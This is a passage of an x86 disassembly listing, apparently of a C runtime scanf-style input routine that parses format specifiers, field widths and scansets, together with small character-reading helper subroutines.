jg short loc_41D8E3
jz short loc_41D905
cmp ebx, 2Ah
jz short loc_41D8DE
cmp ebx, 46h
jz short loc_41D905
cmp ebx, 49h
jz short loc_41D8C0
cmp ebx, 4Ch
jnz short loc_41D8F2
inc [ebp+var_D]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8C0: ; CODE XREF: sub_41D797+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41D8F2
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41D8F2
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8DE: ; CODE XREF: sub_41D797+113�j
inc [ebp+var_E]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8E3: ; CODE XREF: sub_41D797+10C�j
cmp ebx, 68h
jz short loc_41D8FF
cmp ebx, 6Ch
jz short loc_41D8F7
cmp ebx, 77h
jz short loc_41D8FA
loc_41D8F2: ; CODE XREF: sub_41D797+122�j
; sub_41D797+12D�j ...
inc [ebp+var_F]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8F7: ; CODE XREF: sub_41D797+154�j
inc [ebp+var_D]
loc_41D8FA: ; CODE XREF: sub_41D797+159�j
inc [ebp+var_5]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8FF: ; CODE XREF: sub_41D797+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41D905: ; CODE XREF: sub_41D797+107�j
; sub_41D797+10E�j ...
cmp [ebp+var_F], 0
jz loc_41D85E
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41D92A
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41D92A: ; CODE XREF: sub_41D797+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41D948
mov al, [esi]
cmp al, 53h
jz short loc_41D944
cmp al, 43h
jz short loc_41D944
or [ebp+var_5], 0FFh
jmp short loc_41D948
; ---------------------------------------------------------------------------
loc_41D944: ; CODE XREF: sub_41D797+1A1�j
; sub_41D797+1A5�j
mov [ebp+var_5], 1
loc_41D948: ; CODE XREF: sub_41D797+19B�j
; sub_41D797+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41D981
cmp esi, 63h
jz short loc_41D972
cmp esi, 7Bh
jz short loc_41D972
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41E224
pop ecx
jmp short loc_41D97D
; ---------------------------------------------------------------------------
loc_41D972: ; CODE XREF: sub_41D797+1C5�j
; sub_41D797+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
loc_41D97D: ; CODE XREF: sub_41D797+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41D981: ; CODE XREF: sub_41D797+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41D991
cmp [ebp+var_C], eax
jz loc_41E16D
loc_41D991: ; CODE XREF: sub_41D797+1EF�j
cmp esi, 6Fh
jg loc_41DBF8
jz loc_41DEAA
cmp esi, 63h
jz loc_41DBD5
cmp esi, 64h
jz loc_41DEAA
jle loc_41DC22
cmp esi, 67h
jle short loc_41D9F5
cmp esi, 69h
jz short loc_41D9DD
cmp esi, 6Eh
jnz loc_41DC22
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41E0D8
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41D9DD: ; CODE XREF: sub_41D797+229�j
push 64h
pop esi
loc_41D9E0: ; CODE XREF: sub_41D797+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41DC6A
mov [ebp+var_17], 1
jmp loc_41DC6F
; ---------------------------------------------------------------------------
loc_41D9F5: ; CODE XREF: sub_41D797+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41DA11
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41DA16
; ---------------------------------------------------------------------------
loc_41DA11: ; CODE XREF: sub_41D797+26A�j
cmp ebx, 2Bh
jnz short loc_41DA2D
loc_41DA16: ; CODE XREF: sub_41D797+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41DA2D: ; CODE XREF: sub_41D797+27D�j
mov edi, [ebp+arg_0]
loc_41DA30: ; CODE XREF: sub_41D797+294�j
cmp [ebp+var_20], 0
jz short loc_41DA3F
cmp [ebp+var_C], 15Dh
jle short loc_41DA46
loc_41DA3F: ; CODE XREF: sub_41D797+29D�j
mov [ebp+var_C], 15Dh
loc_41DA46: ; CODE XREF: sub_41D797+2A6�j
; sub_41D797+2F2�j
cmp ds:dword_4397AC, 1
jle short loc_41DA5B
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DA66
; ---------------------------------------------------------------------------
loc_41DA5B: ; CODE XREF: sub_41D797+2B6�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 4
loc_41DA66: ; CODE XREF: sub_41D797+2C2�j
test eax, eax
jz short loc_41DA8B
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DA8B
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DA46
; ---------------------------------------------------------------------------
loc_41DA8B: ; CODE XREF: sub_41D797+2D1�j
; sub_41D797+2DB�j
cmp ds:byte_4397B0, bl
jnz short loc_41DAF9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DAF9
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
mov al, ds:byte_4397B0
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41DAB4: ; CODE XREF: sub_41D797+360�j
cmp ds:dword_4397AC, 1
jle short loc_41DAC9
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DAD4
; ---------------------------------------------------------------------------
loc_41DAC9: ; CODE XREF: sub_41D797+324�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 4
loc_41DAD4: ; CODE XREF: sub_41D797+330�j
test eax, eax
jz short loc_41DAF9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DAF9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DAB4
; ---------------------------------------------------------------------------
loc_41DAF9: ; CODE XREF: sub_41D797+2FA�j
; sub_41D797+304�j ...
cmp [ebp+var_1C], 0
jz loc_41DB91
cmp ebx, 65h
jz short loc_41DB11
cmp ebx, 45h
jnz loc_41DB91
loc_41DB11: ; CODE XREF: sub_41D797+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DB91
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41DB38
mov [esi], al
inc esi
jmp short loc_41DB3D
; ---------------------------------------------------------------------------
loc_41DB38: ; CODE XREF: sub_41D797+39A�j
cmp ebx, 2Bh
jnz short loc_41DB5B
loc_41DB3D: ; CODE XREF: sub_41D797+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41DB4C
and [ebp+var_C], eax
jmp short loc_41DB5B
; ---------------------------------------------------------------------------
loc_41DB4C: ; CODE XREF: sub_41D797+3AE�j
; sub_41D797+3F8�j
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41DB5B: ; CODE XREF: sub_41D797+3A4�j
; sub_41D797+3B3�j
cmp ds:dword_4397AC, 1
jle short loc_41DB70
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DB7B
; ---------------------------------------------------------------------------
loc_41DB70: ; CODE XREF: sub_41D797+3CB�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 4
loc_41DB7B: ; CODE XREF: sub_41D797+3D7�j
test eax, eax
jz short loc_41DB91
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DB91
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41DB4C
; ---------------------------------------------------------------------------
loc_41DB91: ; CODE XREF: sub_41D797+366�j
; sub_41D797+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41E20D
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41E19D
cmp [ebp+var_E], 0
jnz loc_41E0FE
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call ds:off_43B908
add esp, 0Ch
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DBD5: ; CODE XREF: sub_41D797+20C�j
cmp [ebp+var_20], eax
jnz short loc_41DBE4
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41DBE4: ; CODE XREF: sub_41D797+441�j
cmp [ebp+var_5], 0
jle short loc_41DBEE
mov [ebp+var_16], 1
loc_41DBEE: ; CODE XREF: sub_41D797+451�j
mov edi, offset dword_43B930
jmp loc_41DD03
; ---------------------------------------------------------------------------
loc_41DBF8: ; CODE XREF: sub_41D797+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41DEA6
sub eax, 3
jz loc_41DCF4
dec eax
dec eax
jz loc_41DEAA
sub eax, 3
jz loc_41D9E0
sub eax, 3
jz short loc_41DC46
loc_41DC22: ; CODE XREF: sub_41D797+21B�j
; sub_41D797+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41E16D
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41E0FE
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DC46: ; CODE XREF: sub_41D797+489�j
cmp [ebp+var_5], 0
jle short loc_41DC50
mov [ebp+var_16], 1
loc_41DC50: ; CODE XREF: sub_41D797+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41DD07
mov eax, edi
lea edi, [eax+1]
jmp loc_41DD03
; ---------------------------------------------------------------------------
loc_41DC6A: ; CODE XREF: sub_41D797+24F�j
cmp ebx, 2Bh
jnz short loc_41DC91
loc_41DC6F: ; CODE XREF: sub_41D797+259�j
dec [ebp+var_C]
jnz short loc_41DC80
cmp [ebp+var_20], 0
jz short loc_41DC80
mov [ebp+var_F], 1
jmp short loc_41DC91
; ---------------------------------------------------------------------------
loc_41DC80: ; CODE XREF: sub_41D797+4DB�j
; sub_41D797+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41DC91: ; CODE XREF: sub_41D797+4D6�j
; sub_41D797+4E7�j
cmp ebx, 30h
jnz loc_41DEDF
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41DCDF
cmp bl, 58h
jz short loc_41DCDF
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41DCC9
push 6Fh
loc_41DCC3: ; CODE XREF: sub_41D797+55B�j
pop esi
jmp loc_41DEDF
; ---------------------------------------------------------------------------
loc_41DCC9: ; CODE XREF: sub_41D797+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41DEDC
; ---------------------------------------------------------------------------
loc_41DCDF: ; CODE XREF: sub_41D797+517�j
; sub_41D797+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41DCC3
; ---------------------------------------------------------------------------
loc_41DCF4: ; CODE XREF: sub_41D797+46F�j
cmp [ebp+var_5], 0
jle short loc_41DCFE
mov [ebp+var_16], 1
loc_41DCFE: ; CODE XREF: sub_41D797+561�j
mov edi, offset dword_43B928
loc_41DD03: ; CODE XREF: sub_41D797+45C�j
; sub_41D797+4CE�j
or [ebp+var_18], 0FFh
loc_41DD07: ; CODE XREF: sub_41D797+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_417330
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41DD2B
cmp byte ptr [edi], 5Dh
jnz short loc_41DD2B
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD2B: ; CODE XREF: sub_41D797+584�j
; sub_41D797+589�j
mov dl, [ebp+var_35]
loc_41DD2E: ; CODE XREF: sub_41D797+592�j
; sub_41D797+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41DD93
inc edi
cmp al, 2Dh
jnz short loc_41DD7A
test dl, dl
jz short loc_41DD7A
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41DD7A
inc edi
cmp dl, cl
jnb short loc_41DD4D
mov al, cl
jmp short loc_41DD51
; ---------------------------------------------------------------------------
loc_41DD4D: ; CODE XREF: sub_41D797+5B0�j
mov al, dl
mov dl, cl
loc_41DD51: ; CODE XREF: sub_41D797+5B4�j
cmp dl, al
ja short loc_41DD76
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41DD5E: ; CODE XREF: sub_41D797+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41DD5E
loc_41DD76: ; CODE XREF: sub_41D797+5BC�j
xor dl, dl
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD7A: ; CODE XREF: sub_41D797+5A0�j
; sub_41D797+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD93: ; CODE XREF: sub_41D797+59B�j
cmp byte ptr [edi], 0
jz loc_41E19D
cmp [ebp+var_3C], 7Bh
jnz short loc_41DDA5
mov [ebp+arg_4], edi
loc_41DDA5: ; CODE XREF: sub_41D797+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41E20D
pop ecx
pop ecx
loc_41DDBC: ; CODE XREF: sub_41D797+6BC�j
; sub_41D797+6C4�j
cmp [ebp+var_20], 0
jz short loc_41DDD0
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41DE6C
loc_41DDD0: ; CODE XREF: sub_41D797+629�j
inc [ebp+var_4]
push edi
call sub_41E1F3
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41DE60
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41DE60
cmp [ebp+var_E], 0
jnz short loc_41DE58
cmp [ebp+var_16], 0
jz short loc_41DE4D
mov ecx, ds:off_4395A0
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41DE2C
inc [ebp+var_4]
push edi
call sub_41E1F3
pop ecx
mov [ebp+var_37], al
loc_41DE2C: ; CODE XREF: sub_41D797+686�j
push ds:dword_4397AC
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_420E98
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41DE50
; ---------------------------------------------------------------------------
loc_41DE4D: ; CODE XREF: sub_41D797+673�j
mov [esi], al
inc esi
loc_41DE50: ; CODE XREF: sub_41D797+6B4�j
mov [ebp+var_2C], esi
jmp loc_41DDBC
; ---------------------------------------------------------------------------
loc_41DE58: ; CODE XREF: sub_41D797+66D�j
inc [ebp+var_30]
jmp loc_41DDBC
; ---------------------------------------------------------------------------
loc_41DE60: ; CODE XREF: sub_41D797+649�j
; sub_41D797+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41E20D
pop ecx
pop ecx
loc_41DE6C: ; CODE XREF: sub_41D797+633�j
cmp [ebp+var_30], esi
jz loc_41E19D
cmp [ebp+var_E], 0
jnz loc_41E0FE
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41E0FE
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41DE9E
and word ptr [eax], 0
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: sub_41D797+6FC�j
and byte ptr [eax], 0
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DEA6: ; CODE XREF: sub_41D797+466�j
mov [ebp+var_D], 1
loc_41DEAA: ; CODE XREF: sub_41D797+203�j
; sub_41D797+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41DEB8
mov [ebp+var_17], 1
jmp short loc_41DEBD
; ---------------------------------------------------------------------------
loc_41DEB8: ; CODE XREF: sub_41D797+719�j
cmp ebx, 2Bh
jnz short loc_41DEDF
loc_41DEBD: ; CODE XREF: sub_41D797+71F�j
dec [ebp+var_C]
jnz short loc_41DECE
cmp [ebp+var_20], 0
jz short loc_41DECE
mov [ebp+var_F], 1
jmp short loc_41DEDF
; ---------------------------------------------------------------------------
loc_41DECE: ; CODE XREF: sub_41D797+729�j
; sub_41D797+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
pop ecx
mov ebx, eax
loc_41DEDC: ; CODE XREF: sub_41D797+543�j
mov [ebp+var_14], ebx
loc_41DEDF: ; CODE XREF: sub_41D797+4FD�j
; sub_41D797+52D�j ...
cmp [ebp+var_30], 0
jz loc_41DFF8
cmp [ebp+var_F], 0
jnz loc_41DFD6
loc_41DEF3: ; CODE XREF: sub_41D797+82C�j
cmp esi, 78h
jnz short loc_41DF47
cmp ds:dword_4397AC, 1
jle short loc_41DF10
push 80h
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DF1D
; ---------------------------------------------------------------------------
loc_41DF10: ; CODE XREF: sub_41D797+768�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 80h
loc_41DF1D: ; CODE XREF: sub_41D797+777�j
test eax, eax
jz loc_41DFC8
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_420F90
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41E1BC
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DF9A
; ---------------------------------------------------------------------------
loc_41DF47: ; CODE XREF: sub_41D797+75F�j
cmp ds:dword_4397AC, 1
jle short loc_41DF5C
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DF67
; ---------------------------------------------------------------------------
loc_41DF5C: ; CODE XREF: sub_41D797+7B7�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 4
loc_41DF67: ; CODE XREF: sub_41D797+7C3�j
test eax, eax
jz short loc_41DFC8
cmp esi, 6Fh
jnz short loc_41DF85
cmp ebx, 38h
jge short loc_41DFC8
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_420F90
jmp short loc_41DF94
; ---------------------------------------------------------------------------
loc_41DF85: ; CODE XREF: sub_41D797+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_417760
loc_41DF94: ; CODE XREF: sub_41D797+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41DF9A: ; CODE XREF: sub_41D797+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41DFB2
dec [ebp+var_C]
jz short loc_41DFD6
loc_41DFB2: ; CODE XREF: sub_41D797+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41DEF3
; ---------------------------------------------------------------------------
loc_41DFC8: ; CODE XREF: sub_41D797+788�j
; sub_41D797+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
loc_41DFD6: ; CODE XREF: sub_41D797+756�j
; sub_41D797+819�j
cmp [ebp+var_17], 0
jz loc_41E0BC
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41E0BC
; ---------------------------------------------------------------------------
loc_41DFF8: ; CODE XREF: sub_41D797+74C�j
cmp [ebp+var_F], 0
jnz loc_41E0B4
loc_41E002: ; CODE XREF: sub_41D797+90A�j
cmp esi, 78h
jz short loc_41E046
cmp esi, 70h
jz short loc_41E046
cmp ds:dword_4397AC, 1
jle short loc_41E021
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E02C
; ---------------------------------------------------------------------------
loc_41E021: ; CODE XREF: sub_41D797+87C�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 4
loc_41E02C: ; CODE XREF: sub_41D797+888�j
test eax, eax
jz short loc_41E0A6
cmp esi, 6Fh
jnz short loc_41E03F
cmp ebx, 38h
jge short loc_41E0A6
shl edi, 3
jmp short loc_41E07E
; ---------------------------------------------------------------------------
loc_41E03F: ; CODE XREF: sub_41D797+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41E07E
; ---------------------------------------------------------------------------
loc_41E046: ; CODE XREF: sub_41D797+86E�j
; sub_41D797+873�j
cmp ds:dword_4397AC, 1
jle short loc_41E05E
push 80h
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E06B
; ---------------------------------------------------------------------------
loc_41E05E: ; CODE XREF: sub_41D797+8B6�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, 80h
loc_41E06B: ; CODE XREF: sub_41D797+8C5�j
test eax, eax
jz short loc_41E0A6
push ebx
shl edi, 4
call sub_41E1BC
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41E07E: ; CODE XREF: sub_41D797+8A6�j
; sub_41D797+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41E090
dec [ebp+var_C]
jz short loc_41E0B4
loc_41E090: ; CODE XREF: sub_41D797+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41E002
; ---------------------------------------------------------------------------
loc_41E0A6: ; CODE XREF: sub_41D797+897�j
; sub_41D797+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
loc_41E0B4: ; CODE XREF: sub_41D797+865�j
; sub_41D797+8F7�j
cmp [ebp+var_17], 0
jz short loc_41E0BC
neg edi
loc_41E0BC: ; CODE XREF: sub_41D797+843�j
; sub_41D797+85C�j ...
cmp esi, 46h
jnz short loc_41E0C5
and [ebp+var_1C], 0
loc_41E0C5: ; CODE XREF: sub_41D797+928�j
cmp [ebp+var_1C], 0
jz loc_41E19D
cmp [ebp+var_E], 0
jnz short loc_41E0FE
inc [ebp+var_34]
loc_41E0D8: ; CODE XREF: sub_41D797+23B�j
cmp [ebp+var_30], 0
jz short loc_41E0EE
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41E0FE
; ---------------------------------------------------------------------------
loc_41E0EE: ; CODE XREF: sub_41D797+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41E0FB
mov [eax], edi
jmp short loc_41E0FE
; ---------------------------------------------------------------------------
loc_41E0FB: ; CODE XREF: sub_41D797+95E�j
mov [eax], di
loc_41E0FE: ; CODE XREF: sub_41D797+241�j
; sub_41D797+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41E14B
; ---------------------------------------------------------------------------
loc_41E109: ; CODE XREF: sub_41D797+93�j
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41E178
mov ecx, ds:off_4395A0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E14B
inc [ebp+var_4]
push edi
call sub_41E1F3
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41E186
dec [ebp+var_4]
loc_41E14B: ; CODE XREF: sub_41D797+970�j
; sub_41D797+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41E161
cmp byte ptr [esi], 25h
jnz short loc_41E1A3
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41E1A3
mov esi, eax
loc_41E161: ; CODE XREF: sub_41D797+9B8�j
mov al, [esi]
test al, al
jnz loc_41D7C1
jmp short loc_41E19D
; ---------------------------------------------------------------------------
loc_41E16D: ; CODE XREF: sub_41D797+1F4�j
; sub_41D797+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41E17D
; ---------------------------------------------------------------------------
loc_41E178: ; CODE XREF: sub_41D797+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41E17D: ; CODE XREF: sub_41D797+9DF�j
call sub_41E20D
pop ecx
pop ecx
jmp short loc_41E19D
; ---------------------------------------------------------------------------
loc_41E186: ; CODE XREF: sub_41D797+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41E20D
dec [ebp+var_4]
push edi
push ebx
call sub_41E20D
add esp, 10h
loc_41E19D: ; CODE XREF: sub_41D797+1F�j
; sub_41D797+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41E1B4
loc_41E1A3: ; CODE XREF: sub_41D797+9BD�j
; sub_41D797+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41E1B7
cmp [ebp+var_15], al
jnz short loc_41E1B7
or eax, 0FFFFFFFFh
jmp short loc_41E1B7
; ---------------------------------------------------------------------------
loc_41E1B4: ; CODE XREF: sub_41D797+A0A�j
mov eax, [ebp+var_34]
loc_41E1B7: ; CODE XREF: sub_41D797+A11�j
; sub_41D797+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D797 endp
; =============== S U B R O U T I N E =======================================
sub_41E1BC proc near ; CODE XREF: sub_41D797+7A3�p
; sub_41D797+8DC�p
arg_0 = dword ptr 4
cmp ds:dword_4397AC, 1
push esi
jle short loc_41E1D6
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E1E5
; ---------------------------------------------------------------------------
loc_41E1D6: ; CODE XREF: sub_41E1BC+8�j
mov esi, [esp+4+arg_0]
mov eax, ds:off_4395A0
mov al, [eax+esi*2]
and eax, 4
loc_41E1E5: ; CODE XREF: sub_41E1BC+18�j
test eax, eax
jnz short loc_41E1EF
and esi, 0FFFFFFDFh
sub esi, 7
loc_41E1EF: ; CODE XREF: sub_41E1BC+2B�j
mov eax, esi
pop esi
retn
sub_41E1BC endp
; =============== S U B R O U T I N E =======================================
sub_41E1F3 proc near ; CODE XREF: sub_41D797+1E1�p
; sub_41D797+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41E205
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41E205: ; CODE XREF: sub_41E1F3+7�j
push edx
call sub_41E248
pop ecx
retn
sub_41E1F3 endp
; =============== S U B R O U T I N E =======================================
sub_41E20D proc near ; CODE XREF: sub_41D797+6B�p
; sub_41D797+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41E223
push [esp+arg_4]
push [esp+4+arg_0]
call sub_420FAF
pop ecx
pop ecx
locret_41E223: ; CODE XREF: sub_41E20D+5�j
retn
sub_41E20D endp
; =============== S U B R O U T I N E =======================================
sub_41E224 proc near ; CODE XREF: sub_41D797+63�p
; sub_41D797+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41E22A: ; CODE XREF: sub_41E224+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41E1F3
mov edi, eax
push edi
call sub_420F60
pop ecx
test eax, eax
pop ecx
jnz short loc_41E22A
mov eax, edi
